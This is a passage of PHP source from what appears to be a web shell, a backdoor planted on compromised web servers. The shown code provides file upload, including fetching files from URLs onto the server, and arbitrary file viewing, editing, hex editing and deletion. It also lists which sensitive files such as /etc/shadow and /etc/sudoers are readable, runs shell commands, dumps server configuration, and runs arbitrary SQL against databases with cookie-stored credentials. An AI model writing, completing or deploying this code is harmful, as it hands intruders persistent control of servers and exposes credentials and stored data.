1924. }else{
1925. if(!is_writable($s_cwd)) $s_msg = "<p class='notif'>Directory ".$s_cwd." is not writable, please change to a writable one</p>";
1926. }
1927.  
1928. if(!empty($s_msg)) $s_result .= $s_msg;
1929.  
1930. $s_result .= "<form action='".$s_self."' method='post' enctype='multipart/form-data'>
1931. <div class='mybox'><h2>Upload from computer</h2>
1932. <table class='myboxtbl'>
1933. <tr><td style='width:140px;'>File</td><td><input type='file' name='filepath' class='inputzbut' style='width:400px;margin:0;' />
1934. </td></tr>
1935. <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolder' value='".$s_cwd."' /></td></tr>
1936. <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilename' value='' /></td></tr>
1937. <tr><td>&nbsp;</td><td>
1938. <input type='submit' name='uploadhd' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1939. <input type='hidden' name='x' value='upload' />
1940. </td></tr>
1941. </table></div></form>
1942.  
1943. <form action='".$s_self."' method='post'>
1944. <div class='mybox'><h2>Upload from internet</h2>
1945. <table class='myboxtbl'>
1946. <tr><td style='width:150px;'>File URL</td><td><input style='width:100%;' class='inputz' type='text' name='fileurl' value='' />
1947. </td></tr>
1948. <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolderurl' value='".$s_cwd."' /></td></tr>
1949. <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilenameurl' value='' /></td></tr>
1950. <tr><td>&nbsp;</td><td>
1951. <input type='submit' name='uploadurl' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1952. <input type='hidden' name='x' value='upload' />
1953. </td></tr>
1954. </table></div></form>";
1955. }
1956.  
1957.  
1958. // view file
1959. elseif(isset($_REQUEST['view'])){
1960. $s_f = ss($_REQUEST['view']);
1961. if(isset($s_fnew) && (trim($s_fnew)!="")) $s_f = $s_fnew;
1962.  
1963. $s_owner = "";
1964. if(is_file($s_f)){
1965. $targetdir = dirname($s_f);
1966. chdir($targetdir);
1967. $s_cwd = cp(getcwd());
1968. setcookie("cwd", $s_cwd ,time() + $s_login_time);
1969.  
1970. if(!$s_win && $s_posix){
1971. $s_name = posix_getpwuid(fileowner($s_f));
1972. $s_group = posix_getgrgid(filegroup($s_f));
1973. $s_owner = "<tr><td>Owner</td><td>".$s_name['name']."<span class='gaya'>:</span>".$s_group['name']."</td></tr>";
1974. }
1975. $s_filn = basename($s_f);
1976. $s_dlfile = get_archiver_available();
1977. $s_dlfile = str_replace("__dlpath__",$s_filn,$s_dlfile);
1978. $s_dlfile = str_replace("__dlcwd__",$s_cwd,$s_dlfile);
1979. $s_result .= "<table class='viewfile' style='width:100%;'>
1980. <tr><td style='width:140px;'>Filename</td><td><span id='".cs($s_filn)."_link'>".$s_f."</span>
1981. <div id='".cs($s_filn)."_form' class='sembunyi'>
1982. <form action='".$s_self."' method='post'>
1983. <input type='hidden' name='oldname' value='".$s_f."' style='margin:0;padding:0;' />
1984. <input type='hidden' name='view' value='".$s_f."' />
1985. <input class='inputz' style='width:200px;' type='text' name='newname' value='".$s_f."' />
1986. <input class='inputzbut' type='submit' name='rename' value='rename' />
1987. </form>
1988. <input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($s_filn)."_form','".cs($s_filn)."_link');\" />
1989. </div>
1990. </td></tr>
1991. <tr><td>Size</td><td>".gs($s_f)." (".@filesize($s_f).")</td></tr>
1992. <tr><td>Permission</td><td>".gp($s_f)."</td></tr>
1993. ".$s_owner."
1994. <tr><td>Create time</td><td>".@date("d-M-Y H:i:s",filectime($s_f))."</td></tr>
1995. <tr><td>Last modified</td><td>".@date("d-M-Y H:i:s",filemtime($s_f))."</td></tr>
1996. <tr><td>Last accessed</td><td>".@date("d-M-Y H:i:s",fileatime($s_f))."</td></tr>
1997. <tr><td>Actions</td><td>
1998. <a href='".$s_self."edit=".$s_f."' title='edit' onclick='return false;'>edit</a> |
1999. <a href='".$s_self."hexedit=".$s_f."' title='edit as hex' onclick='return false;'>hex</a> |
2000. <a href=\"javascript:tukar('".cs($s_filn)."_link','".cs($s_filn)."_form');\" title='rename'>ren</a> |
2001. <a href='".$s_self."del=".$s_f."' title='delete' onclick='return false;'>del</a> ".$s_dlfile."
2002. </td></tr>
2003. <tr><td>View</td><td>
2004. <a href='".$s_self."view=".$s_f."&type=text' onclick='return false;'>text</a> |
2005. <a href='".$s_self."view=".$s_f."&type=code' onclick='return false;'>code</a> |
2006. <a href='".$s_self."view=".$s_f."&type=image' onclick='return false;'>image</a> |
2007. <a href='".$s_self."view=".$s_f."&type=audio' onclick='return false;'>audio</a> |
2008. <a href='".$s_self."view=".$s_f."&type=video' onclick='return false;'>video</a>
2009. </td></tr>
2010. </table>
2011. ";
2012.  
2013. $s_t = "";
2014.  
2015. $s_mime = "";
2016. $s_mime_list = gzinflate(base64_decode($s_mime_types));
2017. $s_ext = trim(substr($s_f, strrpos($s_f, ".")),".");
2018. if(preg_match("/([^\s]+)\ .*\b$s_ext\b.*/i",$s_mime_list,$s_r)){
2019. $s_mime = $s_r[1];
2020. }
2021.  
2022. $s_iinfo = @getimagesize($s_f);
2023. if(strtolower(substr($s_filn,-3,3)) == "php") $s_t = "code";
2024. elseif(is_array($s_iinfo)) $s_t = 'image';
2025. elseif(!empty($s_mime)) $s_t = substr($s_mime,0,strpos($s_mime,"/"));
2026.  
2027. if(isset($_REQUEST['type'])) $s_t = ss($_REQUEST['type']);
2028.  
2029. if($s_t=="image"){
2030. $s_width = (int) $s_iinfo[0];
2031. $s_height = (int) $s_iinfo[1];
2032. $s_imginfo = "Image type = ( ".$s_iinfo['mime']." )<br />
2033. Image Size = <span class='gaul'>( </span>".$s_width." x ".$s_height."<span class='gaul'> )</span><br />";
2034. if($s_width > 800){
2035. $s_width = 800;
2036. $s_imglink = "<p><a href='".$s_self."img=".$s_filn."' onclick='return false;'>
2037. <span class='gaul'>[ </span>view full size<span class='gaul'> ]</span></a></p>";
2038. }
2039. else $s_imglink = "";
2040.  
2041. $s_result .= "<div class='viewfilecontent' style='text-align:center;'>".$s_imglink."
2042. <img width='".$s_width."' src='".$s_self."img=".$s_filn."' alt='".$s_filn."' style='margin:8px auto;padding:0;border:0;' /></div>";
2043.  
2044. }
2045. elseif($s_t=="code"){
2046. $s_result .= "<div class=\"viewfilecontent\">";
2047. $s_file = wordwrap(@file_get_contents($s_f),160,"\n",true);
2048. $s_buff = highlight_string($s_file,true);
2049. $s_old = array("0000BB","000000","FF8000","DD0000", "007700");
2050. $s_new = ($s_theme=="bright")?$s_highlight_bright:$s_highlight_dark;
2051. $s_buff = str_replace($s_old,$s_new, $s_buff);
2052. $s_result .= $s_buff;
2053. $s_result .= "</div>";
2054. }
2055. elseif($s_t=="audio" || $s_t=="video"){
2056. $s_result .= "<div class='viewfilecontent' style='text-align:center;'>
2057. <".$s_t." controls>
2058. <source src='".$s_self."dltype=raw&dlpath=".$s_f."' type='".$s_mime."'>
2059. <object data='".$s_self."dltype=raw&dlpath=".$s_f."'>
2060. <embed src='".$s_self."dltype=raw&dlpath=".$s_f."'>
2061. </object>
2062. </".$s_t.">
2063. </div>";
2064. }
2065. else {
2066. $s_result .= "<pre style='padding: 3px 8px 0 8px;' class='viewfilecontent'>";
2067. $s_result .= str_replace("<","&lt;",str_replace(">","&gt;",(wordwrap(@file_get_contents($s_f),160,"\n",true))));
2068. $s_result .= "</pre>";
2069. }
2070. }
2071. elseif(is_dir($s_f)){
2072. chdir($s_f);
2073. $s_cwd = cp(getcwd());
2074. setcookie("cwd", $s_cwd ,time() + $s_login_time);
2075. $s_result .= showdir($s_cwd);
2076. }
2077. else $s_result .= "<p class='notif'>Cannot find the path specified ".$s_f."</p>";
2078.  
2079. } // edit file
2080. elseif(isset($_REQUEST['edit'])){
2081. $s_f = ss($_REQUEST['edit']);
2082. $s_fc = "";
2083. $s_fcs = "";
2084.  
2085. if(isset($_REQUEST['new']) && ($_REQUEST['new']=='yes')){
2086. $s_num = 1;
2087. if(is_file($s_f)){
2088. $s_pos = strrpos($s_f,"_");
2089. if($s_pos!==false) $s_num = (int) substr($s_f,$s_pos+1);
2090. while(is_file(substr($s_f,0,$s_pos)."_".$s_num)){
2091. $s_num++;
2092. }
2093. $s_f = substr($s_f,0,$s_pos)."_".$s_num;
2094. }
2095. }
2096. else if(is_file($s_f)) $s_fc = @file_get_contents($s_f);
2097.  
2098.  
2099. if(isset($_REQUEST['fc'])){
2100. $s_fc = ssc($_REQUEST['fc']);
2101. if($s_filez = fopen($s_f,"w")){
2102. $s_time = @date("d-M-Y H:i:s",time());
2103. if(fwrite($s_filez,$s_fc)!==false) $s_fcs = "File saved @ ".$s_time;
2104. else $s_fcs = "Failed to save";
2105. fclose($s_filez);
2106. }
2107. else $s_fcs = "Permission denied";
2108. }
2109. else if(is_file($s_f) && !is_writable($s_f)) $s_fcs = "This file is not writable";
2110.  
2111. if(!empty($s_fcs)) $s_result .= "<p class='notif'>".$s_fcs."</p>";
2112. $s_result .= "<form action='".$s_self."' method='post'>
2113. <textarea id='fc' name='fc' class='txtarea'>".hss($s_fc)."</textarea>
2114. <p style='text-align:center;'><input type='text' class='inputz' style='width:99%;' name='edit' value='".$s_f."' /></p>
2115. <p><input type='submit' name='fcsubmit' class='inputzbut' value='Save !' style='width:120px;height:30px;' /></p>
2116. </form>";
2117.  
2118. }// hex edit file
2119. elseif(isset($_REQUEST['hexedit'])){
2120. $s_f = ss($_REQUEST['hexedit']);
2121. $s_fc = "";
2122. $s_fcs = "";
2123. $s_lnum = 0;
2124. $s_hexes = "";
2125.  
2126. if(!empty($_REQUEST['hexes']) || !empty($_REQUEST['hexestxtarea'])){
2127. if(!empty($_REQUEST['hexes'])){
2128. foreach($_REQUEST['hexes'] as $s_hex) $s_hexes .= str_replace(" ","", $s_hex);
2129. }
2130. elseif(!empty($_REQUEST['hexestxtarea'])){
2131. $s_hexes = trim($_REQUEST['hexestxtarea']);
2132. }
2133. if($s_filez = fopen($s_f,"w")){
2134. $s_bins = pack("H*" , $s_hexes);
2135. $s_time = @date("d-M-Y H:i:s",time());
2136. if(fwrite($s_filez,$s_bins)!==false) $s_fcs = "File saved @ ".$s_time;
2137. else $s_fcs = "Failed to save";
2138. fclose($s_filez);
2139. }
2140. else $s_fcs = "Permission denied";
2141. }
2142. else if(is_file($s_f) && !is_writable($s_f)) $s_fcs = "This file is not writable";
2143.  
2144. if(!empty($s_fcs)) $s_result .= "<p class='notif'>".$s_fcs."</p>";
2145. $s_result .= "<form action='".$s_self."' method='post'>
2146. <p style='padding:0;text-align:center;'><input type='text' class='inputz' style='width:100%;' name='hexedit' value='".$s_f."' /></p>
2147. <p class='border-bottom' style='padding:0 0 14px 0;'><input type='submit' name='fcsubmit' class='inputzbut' value='Save !' style='width:120px;height:30px;' onclick=\"return submithex();\" /></p>
2148. <table class='explore'>
2149. ";
2150. if(is_file($s_f)){
2151. $s_fp = fopen($s_f,"r");
2152. if($s_fp) {
2153. $s_ldump = "";
2154. $s_counter = 0;
2155. $s_icounter = 0;
2156. while(!feof($s_fp)){
2157. $s_line = fread($s_fp, 32);
2158. $s_linedump = preg_replace('/[^\x21-\x7E]/','.', $s_line);
2159. $s_linedump = str_replace(">",".",$s_linedump);
2160. $s_linedump = str_replace("<",".",$s_linedump);
2161. $s_linehex = strtoupper(bin2hex($s_line));
2162. $s_linex = str_split($s_linehex,2);
2163. $s_linehex = implode(" ", $s_linex);
2164. $s_addr = sprintf("%08xh",$s_icounter);
2165.  
2166. $s_result .= "<tr><td style='text-align:center;width:60px;'>".$s_addr."</td><td style='text-align:left;width:594px;'>
2167. <input onclick=\"hexupdate('".$s_counter."',event);\" onkeydown=\"return hexfix('".$s_counter."',event);\" onkeyup=\"hexupdate('".$s_counter."',event);\" type='text' class='inputz' id='hex_".$s_counter."' name='hexes[]' value='".$s_linehex."' style='width:578px;' maxlength='".strlen($s_linehex)."' /></td>
2168. <td style='text-align:left;letter-spacing:2px;'>
2169. <pre name='hexdump' id='dump_".$s_counter."' style='margin:0;padding:0;'>".$s_linedump."</pre></td></tr>";
2170. $s_counter++;
2171. $s_icounter+=32;
2172. }
2173. $s_result .= "<input type='hidden' id='counter' value='".$s_counter."' />";
2174. $s_result .= "<textarea name='hexestxtarea' id='hexestxtarea' class='sembunyi'></textarea>";
2175. fclose($s_fp);
2176. }
2177. }
2178. $s_result .= "</table></form>";
2179.  
2180. }// show server information
2181. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='info')){
2182. $s_result = "";
2183. // server misc info
2184. $s_result .= "<p class='notif' onclick=\"toggle('info_server')\">Server Info</p>";
2185. $s_result .= "<div class='info' id='info_server'><table>";
2186.  
2187. if($s_win){
2188. foreach (range("A","Z") as $s_letter){
2189. if((is_dir($s_letter.":\\") && is_readable($s_letter.":\\"))){
2190. $s_drive = $s_letter.":";
2191. $s_result .= "<tr><td>drive ".$s_drive."</td><td>".ts(disk_free_space($s_drive))." free of ".ts(disk_total_space($s_drive))."</td></tr>";
2192. }
2193. }
2194. }
2195. else $s_result .= "<tr><td>root partition</td><td>".ts(disk_free_space("/"))." free of ".ts(disk_total_space("/"))."</td></tr>";
2196.  
2197. $s_result .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
2198. if($s_python) $s_result .= "<tr><td>python</td><td>".exe("python -V")."</td></tr>";
2199. if($s_perl) $s_result .= "<tr><td>perl</td><td>".exe("perl -e \"print \$]\"")."</td></tr>";
2200. if($s_ruby) $s_result .= "<tr><td>ruby</td><td>".exe("ruby -v")."</td></tr>";
2201. if($s_node) $s_result .= "<tr><td>node</td><td>".exe("node -v")."</td></tr>";
2202.  
2203.  
2204.  
2205. if($s_gcc){
2206. $s_gcc_version = exe("gcc --version");
2207. $s_gcc_ver = explode("\n",$s_gcc_version);
2208. if(count($s_gcc_ver)>0) $s_gcc_ver = $s_gcc_ver[0];
2209. $s_result .= "<tr><td>gcc</td><td>".$s_gcc_ver."</td></tr>";
2210. }
2211. if($s_java) $s_result .= "<tr><td>java</td><td>".str_replace("\n", ", ", exe("java -version"))."</td></tr>";
2212.  
2213. $s_interesting = array(
2214. "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases", "/etc/resolv.conf", "/etc/sysctl.conf",
2215. "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
2216. "/etc/ssh/sshd_config",
2217. "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf"," /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
2218. "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
2219. "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
2220. foreach($s_interesting as $s_f){
2221. if(is_file($s_f) && is_readable($s_f))
2222. $s_result .= "<tr><td>".$s_f."</td><td><a href='".$s_self."view=".$s_f."' onclick='return false;'>".$s_f." is readable</a></td></tr>";
2223. }
2224.  
2225.  
2226. $s_result .= "</table></div>";
2227.  
2228. if(!$s_win){
2229. // cpu info
2230. if($s_i_buff=trim(@file_get_contents("/proc/cpuinfo"))){
2231. $s_result .= "<p class='notif' onclick=\"toggle('info_cpu')\">CPU Info</p>";
2232. $s_result .= "<div class='info' id='info_cpu'>";
2233. $s_i_buffs = explode("\n\n", $s_i_buff);
2234. foreach($s_i_buffs as $s_i_buffss){
2235. $s_i_buffss = trim($s_i_buffss);
2236. if($s_i_buffss!=""){
2237. $s_i_buffsss = explode("\n",$s_i_buffss);
2238. $s_result .= "<table>";
2239. foreach($s_i_buffsss as $s_i){
2240. $s_i = trim($s_i);
2241. if($s_i!=""){
2242. $s_ii = explode(":",$s_i);
2243. if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
2244. }
2245. }
2246. $s_result .= "</table>";
2247. }
2248. }
2249. $s_result .= "</div>";
2250. }
2251. // mem info
2252. if($s_i_buff=trim(@file_get_contents("/proc/meminfo"))){
2253. $s_result .= "<p class='notif' onclick=\"toggle('info_mem')\">Memory Info</p>";
2254. $s_i_buffs = explode("\n",$s_i_buff);
2255. $s_result .= "<div class='info' id='info_mem'><table>";
2256. foreach($s_i_buffs as $s_i){
2257. $s_i = trim($s_i);
2258. if($s_i!=""){
2259. $s_ii = explode(":",$s_i);
2260. if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
2261. }
2262. else $s_result .= "</table><table>";
2263. }
2264. $s_result .= "</table></div>";
2265. }
2266. // partition
2267. if($s_i_buff=trim(@file_get_contents("/proc/partitions"))){
2268. $s_i_buff = preg_replace("/\ +/"," ",$s_i_buff);
2269. $s_result .= "<p class='notif' onclick=\"toggle('info_part')\">Partitions Info</p>";
2270. $s_result .= "<div class='info' id='info_part'>";
2271. $s_i_buffs = explode("\n\n", $s_i_buff);
2272. $s_result .= "<table><tr>";
2273. $s_i_head = explode(" ",$s_i_buffs[0]);
2274. foreach($s_i_head as $s_h) $s_result .= "<th>".$s_h."</th>";
2275. $s_result .= "</tr>";
2276. $s_i_buffss = explode("\n", $s_i_buffs[1]);
2277. foreach($s_i_buffss as $s_i_b){
2278. $s_i_row = explode(" ",trim($s_i_b));
2279. $s_result .= "<tr>";
2280. foreach($s_i_row as $s_r) $s_result .= "<td style='text-align:center;'>".$s_r."</td>";
2281. $s_result .= "</tr>";
2282. }
2283. $s_result .= "</table>";
2284. $s_result .= "</div>";
2285. }
2286. }
2287. $s_phpinfo = array(
2288. "PHP General" => INFO_GENERAL,
2289. "PHP Configuration" => INFO_CONFIGURATION,
2290. "PHP Modules" => INFO_MODULES,
2291. "PHP Environment" => INFO_ENVIRONMENT,
2292. "PHP Variables" => INFO_VARIABLES
2293. );
2294. foreach($s_phpinfo as $s_p=>$s_i){
2295. $s_result .= "<p class='notif' onclick=\"toggle('".$s_i."')\">".$s_p."</p>";
2296. ob_start();
2297. eval("phpinfo(".$s_i.");");
2298. $s_b = ob_get_contents();
2299. ob_end_clean();
2300. $s_a = strpos($s_b,"<body>")+6;
2301. $s_z = strpos($s_b,"</body>");
2302. $s_body = substr($s_b,$s_a,$s_z-$s_a);
2303. $s_body = str_replace(",",", ",$s_body);
2304. $s_body = str_replace("&amp;","&",$s_body);
2305. $s_body = str_replace(";","; ",$s_body);
2306. //$s_body = str_replace("%3A%22","%3A%22 ",$s_body);
2307. $s_result .= "<div class='info' id='".$s_i."'>".$s_body."</div>";
2308. }
2309. } // working with database
2310. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='db')){
2311. // sqltype : mysql, mssql, oracle, pgsql, odbc, pdo
2312. $s_sql = array();
2313. $s_sql_deleted = "";
2314. if(isset($_REQUEST['dc'])){
2315. $k = $_REQUEST['dc'];
2316. setcookie("c[".$k."]", "" ,time() - $s_login_time);
2317. $s_sql_deleted = $k;
2318. }
2319.  
2320. if(isset($_COOKIE['c']) && !isset($_REQUEST['connect'])){
2321. foreach($_COOKIE['c'] as $c=>$d){
2322. if($c==$s_sql_deleted) continue;
2323. $s_dbcon = (function_exists(json_encode) && function_exists(json_decode))?json_decode($d):unserialize($d);
2324. foreach($s_dbcon as $k=>$v) $s_sql[$k] = $v;
2325. $s_sqlport = (!empty($s_sql['port']))? ":".$s_sql['port']:"";
2326. $s_result .= "<p class='notif'>[".$s_sql['type']."] ".$s_sql['user']."@".$s_sql['host'].$s_sqlport."
2327. <span style='float:right;'><a href='".$s_self."x=db&connect=connect&sqlhost=".$s_sql['host']."&sqlport=".$s_sql['port']."&sqluser=".$s_sql['user']."&sqlpass=".$s_sql['pass']."&sqltype=".$s_sql['type']."' onclick='return false;'>connect</a> | <a href='".$s_self."x=db&dc=".$c."' onclick='return false;'>disconnect</a></span>
2328. </p>";
2329. }
2330. }
2331. else{
2332. $s_sql['host'] = isset($_REQUEST['sqlhost'])? ssc($_REQUEST['sqlhost']) : "";
2333. $s_sql['port'] = isset($_REQUEST['sqlport'])? ssc($_REQUEST['sqlport']) : "";
2334. $s_sql['user'] = isset($_REQUEST['sqluser'])? ssc($_REQUEST['sqluser']) : "";
2335. $s_sql['pass'] = isset($_REQUEST['sqlpass'])? ssc($_REQUEST['sqlpass']) : "";
2336. $s_sql['type'] = isset($_REQUEST['sqltype'])? ssc($_REQUEST['sqltype']) : "";
2337. }
2338.  
2339. $s_show_form = true;
2340. $s_show_dbs = true;
2341.  
2342. if(isset($_REQUEST['connect'])){
2343. $s_con = sql_connect($s_sql['type'],$s_sql['host'],$s_sql['user'],$s_sql['pass']);
2344. $s_sqlcode = isset($_REQUEST['sqlcode']) ? urldecode(ssc($_REQUEST['sqlcode'])) : "";
2345.  
2346. if($s_con!==false){
2347. if(isset($_REQUEST['sqlinit'])){
2348. $s_sql_cookie = (function_exists(json_encode) && function_exists(json_decode))?json_encode($s_sql):serialize($s_sql);
2349. $s_c_num = substr(md5(time().rand(0,100)),0,3);
2350. while(isset($_COOKIE['c']) && is_array($_COOKIE['c']) && array_key_exists($s_c_num, $_COOKIE['c'])){
2351. $s_c_num = substr(md5(time().rand(0,100)),0,3);
2352. }
2353. setcookie("c[".$s_c_num."]", $s_sql_cookie ,time() + $s_login_time);
2354. }
2355. $s_show_form = false;
2356. $s_result .= "<form action='".$s_self."' method='post'>
2357. <input type='hidden' name='sqlhost' value='".$s_sql['host']."' />
2358. <input type='hidden' name='sqlport' value='".$s_sql['port']."' />
2359. <input type='hidden' name='sqluser' value='".$s_sql['user']."' />
2360. <input type='hidden' name='sqlpass' value='".$s_sql['pass']."' />
2361. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
2362. <input type='hidden' name='x' value='db' />
2363. <input type='hidden' name='connect' value='connect' />
2364. <textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>".$s_sqlcode."</textarea>
2365. <p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />
2366. &nbsp;&nbsp;Separate multiple commands with a semicolon <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>
2367. </form>";
2368.  
2369. if(!empty($s_sqlcode)){
2370. $s_querys = explode(";",$s_sqlcode);
2371. foreach($s_querys as $s_query){
2372. if(trim($s_query) != ""){
2373. $s_hasil = sql_query($s_sql['type'],$s_query,$s_con);
2374. if($s_hasil!=false){
2375. $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".$s_query.";&nbsp;&nbsp;&nbsp;
2376. <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>
2377. <table class='explore sortable' style='width:100%;'><tr>";
2378. for($s_i=0;$s_i<sql_num_fields($s_sql['type'],$s_hasil);$s_i++)
2379. $s_result .= "<th>".@hss(sql_field_name($s_sql['type'],$s_hasil,$s_i))."</th>";
2380. $s_result .= "</tr>";
2381. while($s_rows=sql_fetch_data($s_sql['type'],$s_hasil)){
2382. $s_result .= "<tr>";
2383. foreach($s_rows as $s_r){
2384. if(empty($s_r)) $s_r = " ";
2385. $s_result .= "<td>".@hss($s_r)."</td>";
2386. }
2387. $s_result .= "</tr>";
2388. }
2389. $s_result .= "</table>";
2390. }
2391. else{
2392. $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".$s_query.";&nbsp;&nbsp;&nbsp;
2393. <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";
2394. }
2395. }
2396. }
2397. }
2398. else{
2399. if(($s_sql['type']!='pdo') && ($s_sql['type']!='odbc')){
2400. if($s_sql['type']=='mysql') $s_showdb = "SHOW DATABASES";
2401. elseif($s_sql['type']=='mssql') $s_showdb = "SELECT name FROM master..sysdatabases";
2402. elseif($s_sql['type']=='pgsql') $s_showdb = "SELECT schema_name FROM information_schema.schemata";
2403. elseif($s_sql['type']=='oracle') $s_showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME";
2404. elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showdb = "SELECT \"".$s_sql['host']."\"";
2405. else $s_showdb = "SHOW DATABASES";
2406.  
2407. $s_hasil = sql_query($s_sql['type'],$s_showdb,$s_con);
2408.  
2409. if($s_hasil!=false) {
2410. while($s_rows_arr=sql_fetch_data($s_sql['type'],$s_hasil)){
2411. foreach($s_rows_arr as $s_rows){
2412. $s_result .= "<p class='notif' onclick=\"toggle('db_".$s_rows."')\">".$s_rows."</p>";
2413. $s_result .= "<div class='info' id='db_".$s_rows."'><table class='explore'>";
2414.  
2415. if($s_sql['type']=='mysql') $s_showtbl = "SHOW TABLES FROM ".$s_rows;
2416. elseif($s_sql['type']=='mssql') $s_showtbl = "SELECT name FROM ".$s_rows."..sysobjects WHERE xtype = 'U'";
2417. elseif($s_sql['type']=='pgsql') $s_showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='".$s_rows."'";
2418. elseif($s_sql['type']=='oracle') $s_showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='".$s_rows."'";
2419. elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showtbl = "SELECT name FROM sqlite_master WHERE type='table'";
2420. else $s_showtbl = "";
2421.  
2422. $s_hasil_t = sql_query($s_sql['type'],$s_showtbl,$s_con);
2423. if($s_hasil_t!=false) {
2424. while($s_tables_arr=sql_fetch_data($s_sql['type'],$s_hasil_t)){
2425. foreach($s_tables_arr as $s_tables){
2426. if($s_sql['type']=='mysql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 0,100";
2427. elseif($s_sql['type']=='mssql') $s_dump_tbl = "SELECT TOP 100 * FROM ".$s_rows."..".$s_tables;
2428. elseif($s_sql['type']=='pgsql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 100 OFFSET 0";
2429. elseif($s_sql['type']=='oracle') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." WHERE ROWNUM BETWEEN 0 AND 100;";
2430. elseif($s_sql['type']=='sqlite' || $s_sql['type']=='sqlite3') $s_dump_tbl = "SELECT * FROM ".$s_tables." LIMIT 0,100";
2431. else $s_dump_tbl = "";
2432.  
2433. $s_dump_tbl_link = $s_self."x=db&connect=&sqlhost=".$s_sql['host']."&sqlport=".$s_sql['port']."&sqluser=".$s_sql['user']."&sqlpass=".$s_sql['pass']."&sqltype=".$s_sql['type']."&sqlcode=".$s_dump_tbl;
2434.  
2435. $s_result .= "<tr><td ondblclick=\"return go('".addslashes($s_dump_tbl_link)."',event);\"><a href='".$s_dump_tbl_link."' onclick='return false;'>".$s_tables."</a></td></tr>";
2436. }
2437. }
2438. }
2439. $s_result .= "</table></div>";
2440. }
2441. }
2442. }
2443. }
2444. }
2445. sql_close($s_sql['type'],$s_con);
2446. }
2447. else{
2448. $s_result .= "<p class='notif'>Unable to connect to database</p>";
2449. $s_show_form = true;
2450. }
2451. }
2452.  
2453. if($s_show_form){
2454. // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
2455. $s_sqllist = array();
2456. if(function_exists("mysql_connect")) $s_sqllist["mysql"] = "connect to MySQL <span class='desc' style='font-size:12px;'>- using mysql_*</span>";
2457. if(function_exists("mssql_connect") || function_exists("sqlsrv_connect")) $s_sqllist["mssql"] = "connect to MsSQL <span class='desc' style='font-size:12px;'>- using mssql_* or sqlsrv_*</span>";
2458. if(function_exists("pg_connect")) $s_sqllist["pgsql"] = "connect to PostgreSQL <span class='desc' style='font-size:12px;'>- using pg_*</span>";
2459. if(function_exists("oci_connect")) $s_sqllist["oracle"] = "connect to oracle <span class='desc' style='font-size:12px;'>- using oci_*</span>";
2460. if(function_exists("sqlite_open")) $s_sqllist["sqlite"] = "connect to SQLite <span class='desc' style='font-size:12px;'>- using sqlite_*</span>";
2461. if(class_exists("SQLite3")) $s_sqllist["sqlite3"] = "connect to SQLite3 <span class='desc' style='font-size:12px;'>- using class SQLite3</span>";
2462. if(function_exists("odbc_connect")) $s_sqllist["odbc"] = "connect via ODBC <span class='desc' style='font-size:12px;'>- using odbc_*</span>";
2463. if(class_exists("PDO")) $s_sqllist["pdo"] = "connect via PDO <span class='desc' style='font-size:12px;'>- using class PDO</span>";
2464.  
2465. foreach($s_sqllist as $s_sql['type']=>$s_sqltitle){
2466. if($s_sql['type']=="odbc" || $s_sql['type']=="pdo"){
2467. $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
2468. <form action='".$s_self."' method='post' />
2469. <table class='myboxtbl'>
2470. <tr><td style='width:170px;'>DSN / Connection String</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
2471. <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
2472. <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
2473. </table>
2474. <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
2475. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
2476. <input type='hidden' name='sqlinit' value='init' />
2477. <input type='hidden' name='x' value='db' />
2478. </form>
2479. </div>";
2480. }
2481. elseif($s_sql['type']=="sqlite" || $s_sql['type']=="sqlite3"){
